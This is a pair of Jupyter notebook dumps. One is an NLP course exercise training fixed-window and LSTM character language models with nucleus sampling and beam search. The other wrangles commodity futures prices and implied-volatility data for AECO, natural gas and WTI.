"def score_lines(model, dev_lines, batch_size):\n \"\"\" computes average loss over the entire dataset \"\"\"\n dev_loss_num, dev_loss_len = 0., 0.\n with torch.no_grad():\n for i in range(0, len(dev_lines), batch_size):\n batch_ix = to_matrix(dev_lines[i: i + batch_size])\n dev_loss_num += compute_loss(model, batch_ix).item() * len(batch_ix)\n dev_loss_len += len(batch_ix)\n return dev_loss_num / dev_loss_len\n\ndef generate(model, prefix=BOS, temperature=1.0, max_len=100):\n \"\"\"\n Samples output sequence from probability distribution obtained by model\n :param temperature: samples proportionally to model probabilities ^ temperature\n if temperature == 0, always takes most likely token. Break ties arbitrarily.\n \"\"\"\n with torch.no_grad():\n while True:\n token_probs = model.get_possible_next_tokens(prefix)\n tokens, probs = zip(*token_probs.items())\n if temperature == 0:\n next_token = tokens[np.argmax(probs)]\n else:\n probs = np.array([p ** (1. / temperature) for p in probs])\n probs /= sum(probs)\n next_token = np.random.choice(tokens, p=probs)\n\n prefix += next_token\n if next_token == EOS or len(prefix) > max_len: break\n return prefix",
"_____no_output_____"
]
],
[
[
"### Training loop\n\nFinally, let's train our model on minibatches of data",
"_____no_output_____"
]
],
[
[
"from sklearn.model_selection import train_test_split\ntrain_lines, dev_lines = train_test_split(lines, test_size=0.25, random_state=42)\n\nbatch_size = 256\nscore_dev_every = 250\ntrain_history, dev_history = [], []\nmodel = FixedWindowLanguageModel()\nopt = torch.optim.Adam(model.parameters())\n\n# hint: if you ever wanted to switch to cuda, do it now.\n\n# score untrained model\ndev_history.append((0, score_lines(model, dev_lines, batch_size)))\nprint(\"Sample before training:\", generate(model, 'Bridging'))",
"Sample before training: BridgingGpàś@ε84ü'b'oσ!õ?ôWÉáωhŁρν{ÉAã~W/è8FQ&=w(ν%\\WjáôO0éAβö lo%qMgJα<8RE|O#4Vucõsgü=MüeLα6/q-qklCE\n"
],
[
"from IPython.display import clear_output\nfrom random import sample\nfrom tqdm import trange\n\nfor i in trange(len(train_history), 5000):\n batch = to_matrix(sample(train_lines, batch_size))\n \n \n loss_i = compute_loss(model, batch)\n \n opt.zero_grad()\n loss_i.backward()\n opt.step()\n \n train_history.append((i, loss_i.item()))\n \n if (i + 1) % 50 == 0:\n clear_output(True)\n plt.scatter(*zip(*train_history), alpha=0.1, label='train_loss')\n if len(dev_history):\n plt.plot(*zip(*dev_history), color='red', label='dev_loss')\n plt.legend(); plt.grid(); plt.show()\n print(\"Generated examples (tau=0.5):\")\n for _ in range(3):\n print(generate(model, temperature=0.5))\n \n if (i + 1) % score_dev_every == 0:\n print(\"Scoring dev...\")\n dev_history.append((i, score_lines(model, dev_lines, batch_size)))\n print('#%i Dev loss: %.3f' % dev_history[-1])\n",
"_____no_output_____"
],
[
"assert np.mean(train_history[:10], axis=0)[1] > np.mean(train_history[-10:], axis=0)[1], \"The model didn't converge.\"\nprint(\"Final dev loss:\", dev_history[-1][-1])\n\nfor i in range(10):\n print(generate(model, temperature=0.5))",
"Final dev loss: 0.008852234311220123\n Foress the trobles and cons as andse finasion thation late for as the ang arner andec ination thing \n Ne whe s and se work serecentigo s ale tion are the des an ing and with al he whe the the s an thar \n Ad pores mantion the prodeat des of amplesentitit formation lation of the s aletrom ation as inged \n Scoproblem io preatival oral and tha deation thed the requede the sentren s anderating is wors and t\n Nesion dal and ale and bee verel cende mode abetion the re pores machint on the probes the the the \n Aderens the s apporeas aralization the sens de thmention aring an objective the se s for andition th\n A peration d aund araly thow ing arel cod extive rechis pacel mation late the he se the cons in tho \n Araplearne and the the pesertint at of ars aralize toves ; This and the ins ate the serevere tores t\n Faris and works mation that on the pares. The tho se whed er be der and and sed pe poralis and the p\n Os ane Experache ron seathec int on or alsico the beat onstion anderal orons mo the ural tion teding\n"
]
],
[
[
"### RNN Language Models (3 points including training)\n\nFixed-size architectures are reasonably good when capturing short-term dependencies, but their design prevents them from capturing any signal outside their window. We can mitigate this problem by using a __recurrent neural network__:\n\n$$ h_0 = \\vec 0 ; \\quad h_{t+1} = RNN(x_t, h_t) $$\n\n$$ p(x_t \\mid x_0, \\dots, x_{t-1}, \\theta) = dense_{softmax}(h_{t-1}) $$\n\nSuch model processes one token at a time, left to right, and maintains a hidden state vector between them. Theoretically, it can learn arbitrarily long temporal dependencies given large enough hidden size.\n\n<img src='https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/rnn_lm.jpg' width=480px>",
"_____no_output_____"
]
],
[
[
"class RNNLanguageModel(nn.Module):\n def __init__(self, n_tokens=n_tokens, emb_size=16, hid_size=256):\n \"\"\" \n Build a recurrent language model.\n You are free to choose anything you want, but the recommended architecture is\n - token embeddings\n - one or more LSTM/GRU layers with hid size\n - linear layer to predict logits\n \n :note: if you use nn.RNN/GRU/LSTM, make sure you specify batch_first=True\n With batch_first, your model operates with tensors of shape [batch_size, sequence_length, num_units]\n Also, please read the docs carefully: they don't just return what you want them to return :)\n \"\"\"\n super().__init__() # initialize base class to track sub-layers, trainable variables, etc.\n \n # YOUR CODE - create layers/variables/etc\n \n self.emb = nn.Embedding(n_tokens, emb_size)\n self.lstm = nn.LSTM(input_size=emb_size, hidden_size=hid_size, num_layers=1, batch_first=True)\n self.fc = nn.Linear(hid_size, n_tokens)\n #END OF YOUR CODE\n \n def __call__(self, input_ix):\n \"\"\"\n compute language model logits given input tokens\n :param input_ix: batch of sequences with token indices, tensor: int32[batch_size, sequence_length]\n :returns: pre-softmax linear outputs of language model [batch_size, sequence_length, n_tokens]\n these outputs will be used as logits to compute P(x_t | x_0, ..., x_{t - 1})\n \"\"\"\n # YOUR CODE - apply layers, see docstring above\n x = self.emb(input_ix)\n x_lstm, (h_n, c_n) = self.lstm(x)\n x_fc = self.fc(x_lstm)\n return x_fc # output tensor should be of shape [batch_size, sequence_length, n_tokens]\n \n def get_possible_next_tokens(self, prefix=BOS, temperature=1.0, max_len=100):\n \"\"\" :returns: probabilities of next token, dict {token : prob} for all tokens \"\"\"\n prefix_ix = torch.as_tensor(to_matrix([prefix]), dtype=torch.int64)\n with torch.no_grad():\n probs = torch.softmax(self(prefix_ix)[0, -1], dim=-1).cpu().numpy() # shape: [n_tokens]\n return dict(zip(tokens, probs))\n ",
"_____no_output_____"
],
[
"model = RNNLanguageModel()\n\ndummy_input_ix = torch.as_tensor(to_matrix(dummy_lines))\ndummy_logits = model(dummy_input_ix)\n\nassert isinstance(dummy_logits, torch.Tensor)\nassert dummy_logits.shape == (len(dummy_lines), max(map(len, dummy_lines)), n_tokens), \"please check output shape\"\nassert not np.allclose(dummy_logits.cpu().data.numpy().sum(-1), 1), \"please predict linear outputs, don't use softmax (maybe you've just got unlucky)\"\nprint('Weights:', tuple(name for name, w in model.named_parameters()))",
"Weights: ('emb.weight', 'lstm.weight_ih_l0', 'lstm.weight_hh_l0', 'lstm.bias_ih_l0', 'lstm.bias_hh_l0', 'fc.weight', 'fc.bias')\n"
],
[
"# test for lookahead\ndummy_input_ix_2 = torch.as_tensor(to_matrix([line[:3] + 'e' * (len(line) - 3) for line in dummy_lines]))\ndummy_logits_2 = model(dummy_input_ix_2)\n\nassert torch.allclose(dummy_logits[:, :3], dummy_logits_2[:, :3]), \"your model's predictions depend on FUTURE tokens. \" \\\n \" Make sure you don't allow any layers to look ahead of current token.\" \\\n \" You can also get this error if your model is not deterministic (e.g. dropout). Disable it for this test.\"",
"_____no_output_____"
]
],
[
[
"### RNN training\n\nOur RNN language model should optimize the same loss function as fixed-window model. But there's a catch. Since RNN recurrently multiplies gradients through many time-steps, gradient values may explode, [ruining](https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/nan.jpg) your model.\nThe common solution to that problem is to clip gradients either [individually](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/clip_by_value) or [globally](https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/clip_by_global_norm).\n\nYour task here is to implement the training code that minimizes the loss function. If you encounter large loss fluctuations during training, please add [gradient clipping](https://pytorch.org/docs/stable/generated/torch.nn.utils.clip_grad_norm_.html) using urls above. But its **not necessary** to use gradient clipping if you don't need it.\n\n_Note: gradient clipping is not exclusive to RNNs. Convolutional networks with enough depth often suffer from the same issue._",
"_____no_output_____"
]
],
[
[
"batch_size = 64 # <-- please tune batch size to fit your CPU/GPU configuration\nscore_dev_every = 250\ntrain_history, dev_history = [], []\n\nmodel = RNNLanguageModel(n_tokens=136)\nopt = torch.optim.Adam(model.parameters())\n\n# score untrained model\ndev_history.append((0, score_lines(model, dev_lines, batch_size)))\nprint(\"Sample before training:\", generate(model, 'Bridging'))",
"Sample before training: Bridgingv#,`ã°\n\n"
],
[
"from IPython.display import clear_output\nfrom random import sample\nfrom tqdm import trange\n\nfor i in trange(len(train_history), 5000):\n batch = to_matrix(sample(train_lines, batch_size))\n \n # <YOUR CODE - one step of the training loop for your RNN model>\n opt.zero_grad() \n loss_i = compute_loss(model, batch)\n loss_i.backward()\n nn.utils.clip_grad.clip_grad_value_(model.parameters(), 0.5)\n opt.step()\n\n train_history.append((i, float(loss_i)))\n \n if (i + 1) % 50 == 0:\n clear_output(True)\n plt.scatter(*zip(*train_history), alpha=0.1, label='train_loss')\n if len(dev_history):\n plt.plot(*zip(*dev_history), color='red', label='dev_loss')\n plt.legend(); plt.grid(); plt.show()\n print(\"Generated examples (tau=0.5):\")\n for _ in range(3):\n print(generate(model, temperature=0.5))\n \n if (i + 1) % score_dev_every == 0:\n print(\"Scoring dev...\")\n dev_history.append((i, score_lines(model, dev_lines, batch_size)))\n print('#%i Dev loss: %.3f' % dev_history[-1])\n",
"_____no_output_____"
],
[
"assert np.mean(train_history[:10], axis=0)[1] > np.mean(train_history[-10:], axis=0)[1], \"The model didn't converge.\"\nprint(\"Final dev loss:\", dev_history[-1][-1])\nfor i in range(10):\n print(generate(model, temperature=0.5))",
"Final dev loss: 0.018180988125684784\n Learning to Determination on Model Herning for Non-Low-Rank Neural Networks ; We present a multi-ana\n An Event Sensing Approach for Image Convolutional Neural Networks ; Deep neural network to formaliza\n A New Sparse Segmentation ; The algorithm in the parameter and complete theoretical static constrain\n Neural Networks for deep Learning ; The problem of community to a control based on strategy of the a\n Structural Optimization and Experimental Learning ; We show to relate and important to some of the g\n A Bayesian networks and Proposed Learning ; In this paper, we propose a new approach to statisticall\n Real-Time Selection (LSTM) method for interest containing an algorithm for Recurrent Neural Networks\n Deep Learning for Measure for Streams ; The proposed approach to a generation of the same and explan\n Recurrent Neural Networks for Construction Sensing ; The network models for complex the statistical \n Link Convolutional Neural Networks for Monte Call Microses ; In this paper, we propose a new paramet\n"
]
],
[
[
"### Alternative sampling strategies (1 point)\n\nSo far we've sampled tokens from the model in proportion with their probability.\nHowever, this approach can sometimes generate nonsense words due to the fact that softmax probabilities of these words are never exactly zero. This issue can be somewhat mitigated with sampling temperature, but low temperature harms sampling diversity. Can we remove the nonsense words without sacrificing diversity? __Yes, we can!__ But it takes a different sampling strategy.\n\n__Top-k sampling:__ on each step, sample the next token from __k most likely__ candidates from the language model.\n\nSuppose $k=3$ and the token probabilities are $p=[0.1, 0.35, 0.05, 0.2, 0.3]$. You first need to select $k$ most likely words and set the probability of the rest to zero: $\\hat p=[0.0, 0.35, 0.0, 0.2, 0.3]$ and re-normalize: \n$p^*\\approx[0.0, 0.412, 0.0, 0.235, 0.353]$.\n\n__Nucleus sampling:__ similar to top-k sampling, but this time we select $k$ dynamically. In nucleous sampling, we sample from top-__N%__ fraction of the probability mass.\n\nUsing the same $p=[0.1, 0.35, 0.05, 0.2, 0.3]$ and nucleous N=0.9, the nucleous words consist of:\n1. most likely token $w_2$, because $p(w_2) < N$\n2. second most likely token $w_5$, $p(w_2) + p(w_5) = 0.65 < N$\n3. third most likely token $w_4$ because $p(w_2) + p(w_5) + p(w_4) = 0.85 < N$\n\nAnd thats it, because the next most likely word would overflow: $p(w_2) + p(w_5) + p(w_4) + p(w_1) = 0.95 > N$.\n\nAfter you've selected the nucleous words, you need to re-normalize them as in top-k sampling and generate the next token.\n\n__Your task__ is to implement nucleus sampling variant and see if its any good.",
"_____no_output_____"
]
],
[
[
"def generate_nucleus(model, prefix=BOS, nucleus=0.9, max_len=100):\n \"\"\"\n Generate a sequence with nucleous sampling\n :param prefix: a string containing space-separated previous tokens\n :param nucleus: N from the formulae above, N \\in [0, 1]\n :param max_len: generate sequences with at most this many tokens, including prefix\n \n :note: make sure that nucleous always contains at least one word, even if p(w*) > nucleus\n \n \"\"\"\n while True:\n token_probs = model.get_possible_next_tokens(prefix)\n tokens, probs = zip(*sorted(token_probs.items(), key=lambda x: x[1], reverse=True))\n probs = list(probs)\n prob_sum = 0\n max_idx = 0\n for i in range(len(probs)):\n prob_sum += probs[i]\n if prob_sum > nucleus:\n max_idx = i\n break\n for j in range(max_idx + 1, len(probs)): probs[j] = 0\n norm = np.sum(probs)\n probs = [p/norm for p in probs]\n next_token = np.random.choice(tokens, p=probs)\n \n prefix += next_token\n if next_token == EOS or len(prefix) > max_len: break\n return prefix",
"_____no_output_____"
],
[
"for i in range(10):\n print(generate_nucleus(model))",
" Point of Multi-Reguling Optimization Based Graph ; A Classification algorithms in the properties of \n The Variational Face Mutation Assessment of Bayesian Action Approach to Cameras ; We introduce the S\n A Huper Analysis of Image Recognition in Latent Deformation of Results ; This paper and sensing a mu\n Interest-based Design Scenario Towards Based Reported Matrix Fully Neural Network for Find Combinano\n Shary Detection Images Makes with Distribution in Erguine Mutual Generative Models ; We introduce th\n Regression with Matagative Field consistency for for a specific tracking ; As the results with sou\n For a Task Emploted Via Geometry Activation ; In this paper, we exploit consist loss in the experi\n Segmentation in Challenging Usel Level Independent Learning ; This paper is to estimate the research\n A New Extraction ; Deconvolutions and often unknowledges in so not approaches. The end-to-end first \n Multi-Form in Interpretability of Estimation ; Computer vision problem by solution and devices subsp\n"
]
],
[
[
"### Bonus quest I: Beam Search (2 pts incl. samples)\n\nAt times, you don't really want the model to generate diverse outputs as much as you want a __single most likely hypothesis.__ A single best translation, most likely continuation of the search query given prefix, etc. Except, you can't get it. \n\nIn order to find the exact most likely sequence containing 10 tokens, you would need to enumerate all $|V|^{10}$ possible hypotheses. In practice, 9 times out of 10 you will instead find an approximate most likely output using __beam search__.\n\nHere's how it works:\n0. Initial `beam` = [prefix], max beam_size = k\n1. for T steps:\n2. ` ... ` generate all possible next tokens for all hypotheses in beam, formulate `len(beam) * len(vocab)` candidates\n3. ` ... ` select beam_size best for all candidates as new `beam`\n4. Select best hypothesis (-es?) from beam",
"_____no_output_____"
]
],
[
[
"from IPython.display import HTML\n# Here's what it looks like:\n!wget -q https://raw.githubusercontent.com/yandexdataschool/nlp_course/2020/resources/beam_search.html\nHTML(\"beam_search.html\")",
"_____no_output_____"
],
[
"def generate_beamsearch(model, prefix=BOS, beam_size=4, length=5):\n \"\"\"\n Generate a sequence with nucleous sampling\n :param prefix: a string containing space-separated previous tokens\n :param nucleus: N from the formulae above, N \\in [0, 1]\n :param length: generate sequences with at most this many tokens, NOT INCLUDING PREFIX\n :returns: beam_size most likely candidates\n :note: make sure that nucleous always contains at least one word, even if p(w*) > nucleus\n \"\"\"\n \n # <YOUR CODE HERE>\n sequence_prob = []\n for i in range(length):\n if len(sequence_prob) == 0:\n token_probs = model.get_possible_next_tokens(prefix)\n token_probs = sorted(token_probs.items(), key=lambda x: x[1], reverse=True)\n sequence_prob = [(token, np.log(prob)) for token, prob in token_probs[:beam_size]]\n else:\n sequence_prob_new = []\n for tok, log_prob in sequence_prob:\n prefix_new = prefix + tok\n # print(f'prefix: {prefix_new}')\n token_probs = model.get_possible_next_tokens(prefix_new)\n token_probs = sorted(token_probs.items(), key=lambda x: x[1], reverse=True)\n sequence_prob_new += [(tok +token, log_prob + np.log(prob)) for token, prob in token_probs[:beam_size]]\n # print(f'sequence_prob_new: {sequence_prob_new}')\n sequence_prob = sorted(sequence_prob_new, key=lambda x: x[1], reverse=True)[:beam_size]\n print(f'at time {i}, sequence_prob: {sequence_prob}')\n ...\n \n sequence_prob.sort(key=lambda x: x[1], reverse=True)\n return sequence_prob[0][0]\n ",
"_____no_output_____"
],
[
"generate_nucleus(model, prefix=' deep ', max_len=10)",
"_____no_output_____"
],
[
"generate_beamsearch(model, prefix=' deep ', beam_size=10)",
"at time 0, sequence_prob: [('l', -1.5068771), ('n', -1.8065959), ('L', -2.6358395), ('N', -2.8169146), ('c', -2.9389367), ('a', -3.3885388), (' ', -3.416483), ('C', -3.5385532), ('R', -3.5742204), ('e', -3.672916)]\nat time 1, sequence_prob: [('le', -1.5643963), ('ne', -1.8384411), ('Le', -2.836633), ('Ne', -2.8548415), ('co', -3.2234898), (' ', -3.5252151), ('Re', -3.7488828), ('Co', -4.04846), ('an', -4.1490107), ('en', -4.306381)]\nat time 2, sequence_prob: [('lea', -1.6008773), ('neu', -2.1250048), ('Lea', -2.9126318), ('Neu', -3.0605521), ('con', -3.4188592), ('net', -3.4200287), ('Con', -4.4806757), ('and', -4.520799), ('Rec', -4.668638), ('Net', -4.732559)]\nat time 3, sequence_prob: [('lear', -1.6240636), ('neur', -2.1312099), ('Lear', -2.9528904), ('Neur', -3.0653412), ('netw', -3.4399335), ('conv', -4.4241753), ('and ', -4.534765), ('cons', -4.6973867), ('Netw', -4.773192), ('Conv', -4.849742)]\nat time 4, sequence_prob: [('learn', -1.6297319), ('neura', -2.1763425), ('Learn', -2.9623094), ('Neura', -3.105021), ('netwo', -3.4438837), ('Netwo', -4.774398), ('convo', -4.823792), ('Convo', -5.1949706), ('neuro', -5.445722), ('const', -5.5541863)]\n"
],
[
"# check it out: which beam size works best?\n# find at least 5 prefixes where beam_size=1 and 8 generates different sequences",
"_____no_output_____"
]
],
[
[
"### Bonus quest II: Ultimate Language Model (2+ pts)\n\nSo you've learned the building blocks of neural language models, you can now build the ultimate monster: \n* Make it char-level, word level or maybe use sub-word units like [bpe](https://github.com/rsennrich/subword-nmt);\n* Combine convolutions, recurrent cells, pre-trained embeddings and all the black magic deep learning has to offer;\n * Use strides to get larger window size quickly. Here's a [scheme](https://storage.googleapis.com/deepmind-live-cms/documents/BlogPost-Fig2-Anim-160908-r01.gif) from google wavenet.\n* Train on large data. Like... really large. Try [1 Billion Words](http://www.statmt.org/lm-benchmark/1-billion-word-language-modeling-benchmark-r13output.tar.gz) benchmark;\n* Use training schedules to speed up training. Start with small length and increase over time; Take a look at [one cycle](https://medium.com/@nachiket.tanksale/finding-good-learning-rate-and-the-one-cycle-policy-7159fe1db5d6) for learning rate;\n\n_You are NOT required to submit this assignment. Please make sure you don't miss your deadline because of it :)_",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb036ad9473e480f26fe806ac756d88284fb88e9 | 72,237 | ipynb | Jupyter Notebook | data_wrangling.ipynb | smseifi/commodity_option_pricing | 35088e691957fb6bf1aba1fb9cbfcd300b6b18fa | [
"MIT"
] | null | null | null | data_wrangling.ipynb | smseifi/commodity_option_pricing | 35088e691957fb6bf1aba1fb9cbfcd300b6b18fa | [
"MIT"
] | null | null | null | data_wrangling.ipynb | smseifi/commodity_option_pricing | 35088e691957fb6bf1aba1fb9cbfcd300b6b18fa | [
"MIT"
] | null | null | null | 29.496529 | 129 | 0.402951 | [
[
[
"import os\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pyplot as plt\n\nfrom pandas.tseries.frequencies import to_offset",
"_____no_output_____"
],
[
"print(*os.listdir(\"./data\"), sep=\"\\n\")",
"wrangled_data\norig_data\n"
],
[
"orig_data_dir = \"./data/orig_data/\"\nprint(*os.listdir(orig_data_dir), sep=\"\\n\")",
"PricesFile1.csv\nNG_ImpliedVols2020.csv\nNG_ImpliedVols2022.csv\nNG_ImpliedVols2021.csv\nWTI_ImpliedVols2022.csv\nWTI_ImpliedVols2020.csv\nWTI_ImpliedVols2021.csv\nInterestRates.csv\n"
],
[
"prices_df = pd.read_csv(orig_data_dir+\"PricesFile1.csv\")\nprices_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 6130 entries, 0 to 6129\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 priceindex 6130 non-null object \n 1 pricedate 6130 non-null object \n 2 delivdate 6130 non-null object \n 3 price 6130 non-null float64\ndtypes: float64(1), object(3)\nmemory usage: 191.7+ KB\n"
],
[
"prices_df.head()",
"_____no_output_____"
],
[
"prices_df.pricedate, prices_df.delivdate = pd.to_datetime(prices_df.pricedate), pd.to_datetime(prices_df.delivdate)\nprices_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 6130 entries, 0 to 6129\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 priceindex 6130 non-null object \n 1 pricedate 6130 non-null datetime64[ns]\n 2 delivdate 6130 non-null datetime64[ns]\n 3 price 6130 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 191.7+ KB\n"
],
[
"prices_df.rename(columns={\"priceindex\" : \"index\", \"pricedate\" : \"t\", \"delivdate\" : \"T\", \"price\" : \"F\"}, \n inplace=True)\nprices_df.head()",
"_____no_output_____"
],
[
"p_i = prices_df[\"index\"].unique()\nprint(*p_i, sep=\"\\n\")",
"AECO NIT MONTHLY (7A) US$\nAECO NIT MONTHLY (7A) US$ FWD\nNYMEX Natural Gas\nWTI NYMEX LIGHT SWEET\n"
],
[
"prices_df[\"index\"].value_counts()",
"_____no_output_____"
],
[
"grouped_by_p_i = prices_df.groupby(\"index\")",
"_____no_output_____"
],
[
"for i in range(len(p_i)):\n \n df = grouped_by_p_i.get_group(p_i[i])\n print(\"index : \" + p_i[i])\n print(\"t_min is \" + str(min(df.t).date()) + \"\\t\" + \"t_max is \" + str(max(df.t).date()))\n print(\"T_min is \" + str(min(df[\"T\"]).date()) + \"\\t\" + \"T_max is \" + str(max(df[\"T\"]).date()) + \"\\n\")\n \n del df\ndel i",
"index : AECO NIT MONTHLY (7A) US$\nt_min is 2020-03-01\tt_max is 2020-05-01\nT_min is 2020-03-01\tT_max is 2020-05-01\n\nindex : AECO NIT MONTHLY (7A) US$ FWD\nt_min is 2020-03-02\tt_max is 2020-05-29\nT_min is 2020-04-01\tT_max is 2022-12-01\n\nindex : NYMEX Natural Gas\nt_min is 2020-03-02\tt_max is 2020-05-29\nT_min is 2020-04-01\tT_max is 2022-12-01\n\nindex : WTI NYMEX LIGHT SWEET\nt_min is 2020-03-02\tt_max is 2020-05-29\nT_min is 2020-03-01\tT_max is 2022-12-01\n\n"
],
[
"df = prices_df[prices_df.t > prices_df[\"T\"]]\ndf.head()",
"_____no_output_____"
],
[
"df[\"index\"].value_counts()",
"_____no_output_____"
],
[
"df.nunique()",
"_____no_output_____"
],
[
"del df",
"_____no_output_____"
],
[
"AECO_futures_df = grouped_by_p_i.get_group(p_i[1])\nAECO_futures_df.head()",
"_____no_output_____"
],
[
"AECO_futures_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 2049 entries, 3 to 2051\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 2049 non-null object \n 1 t 2049 non-null datetime64[ns]\n 2 T 2049 non-null datetime64[ns]\n 3 F 2049 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 80.0+ KB\n"
],
[
"AECO_futures_df.to_csv(r\"./data/wrangled_data/AECO_futures.csv\", index=False)",
"_____no_output_____"
],
[
"NG_futures_df = grouped_by_p_i.get_group(p_i[2])\nNG_futures_df.head()",
"_____no_output_____"
],
[
"NG_futures_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 2018 entries, 2052 to 4069\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 2018 non-null object \n 1 t 2018 non-null datetime64[ns]\n 2 T 2018 non-null datetime64[ns]\n 3 F 2018 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 78.8+ KB\n"
],
[
"NG_futures_df.to_csv(r\"./data/wrangled_data/NG_futures.csv\", index=False)",
"_____no_output_____"
],
[
"WTI_futures_df = grouped_by_p_i.get_group(p_i[3])\nWTI_futures_df = WTI_futures_df[WTI_futures_df.t < WTI_futures_df[\"T\"]]\nWTI_futures_df.head()",
"_____no_output_____"
],
[
"WTI_futures_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 1997 entries, 4071 to 6129\nData columns (total 4 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 1997 non-null object \n 1 t 1997 non-null datetime64[ns]\n 2 T 1997 non-null datetime64[ns]\n 3 F 1997 non-null float64 \ndtypes: datetime64[ns](2), float64(1), object(1)\nmemory usage: 78.0+ KB\n"
],
[
"WTI_futures_df.to_csv(r\"./data/wrangled_data/WTI_futures.csv\", index=False)",
"_____no_output_____"
],
[
"NG_IV_20_df = pd.read_csv(orig_data_dir+\"NG_ImpliedVols2020.csv\")\nNG_IV_20_df.head()",
"_____no_output_____"
],
[
"NG_IV_20_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 33212 entries, 0 to 33211\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 33212 non-null object \n 1 volatilitydate 33212 non-null object \n 2 strikeprice 33212 non-null float64\n 3 begtime 33212 non-null object \n 4 volatility 33212 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 1.3+ MB\n"
],
[
"NG_IV_21_df = pd.read_csv(orig_data_dir+\"NG_ImpliedVols2021.csv\")\nNG_IV_21_df.head()",
"_____no_output_____"
],
[
"NG_IV_21_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 59166 entries, 0 to 59165\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 59166 non-null object \n 1 volatilitydate 59166 non-null object \n 2 strikeprice 59166 non-null float64\n 3 begtime 59166 non-null object \n 4 volatility 59166 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 2.3+ MB\n"
],
[
"NG_IV_22_df = pd.read_csv(orig_data_dir+\"NG_ImpliedVols2022.csv\")\nNG_IV_22_df.head()",
"_____no_output_____"
],
[
"NG_IV_22_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 60480 entries, 0 to 60479\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 60480 non-null object \n 1 volatilitydate 60480 non-null object \n 2 strikeprice 60480 non-null float64\n 3 begtime 60480 non-null object \n 4 volatility 60480 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 2.3+ MB\n"
],
[
"frames = [NG_IV_20_df, NG_IV_21_df, NG_IV_22_df]\nNG_IV_df = pd.concat(frames)\n\ndel frames",
"_____no_output_____"
],
[
"NG_IV_df.rename(columns={\"volatilityindex\" : \"index\", \"volatilitydate\" : \"t\", \"strikeprice\" : \"K\",\n \"begtime\" : \"T\", \"volatility\" : \"sigma\"}, inplace=True)\nNG_IV_df = NG_IV_df[[\"index\", \"t\", \"T\", \"K\", \"sigma\"]]\nNG_IV_df[\"index\"] = \"NYMEX Natural Gas\"\nNG_IV_df.head()",
"_____no_output_____"
],
[
"NG_IV_df[\"t\"], NG_IV_df[\"T\"] = pd.to_datetime(NG_IV_df[\"t\"]), pd.to_datetime(NG_IV_df[\"T\"])\nNG_IV_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nInt64Index: 152858 entries, 0 to 60479\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 index 152858 non-null object \n 1 t 152858 non-null datetime64[ns]\n 2 T 152858 non-null datetime64[ns]\n 3 K 152858 non-null float64 \n 4 sigma 152858 non-null float64 \ndtypes: datetime64[ns](2), float64(2), object(1)\nmemory usage: 7.0+ MB\n"
],
[
"for i in [\"t\", \"T\"]:\n print(i + \"_min is \" + str(min(NG_IV_df[i]).date()) + \"\\t\" + i + \"_max is \" + str(max(NG_IV_df[i]).date())\n + \"\\n\")\ndel i",
"t_min is 2020-03-02\tt_max is 2020-05-29\n\nT_min is 2020-04-01\tT_max is 2022-12-01\n\n"
],
[
"WTI_IV_20_df = pd.read_csv(orig_data_dir+\"WTI_ImpliedVols2020.csv\")\nWTI_IV_20_df.head()",
"_____no_output_____"
],
[
"WTI_IV_20_df.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 32968 entries, 0 to 32967\nData columns (total 5 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 volatilityindex 32968 non-null object \n 1 volatilitydate 32968 non-null object \n 2 strikeprice 32968 non-null float64\n 3 begtime 32968 non-null object \n 4 volatility 32968 non-null float64\ndtypes: float64(2), object(3)\nmemory usage: 1.3+ MB\n"
],
[
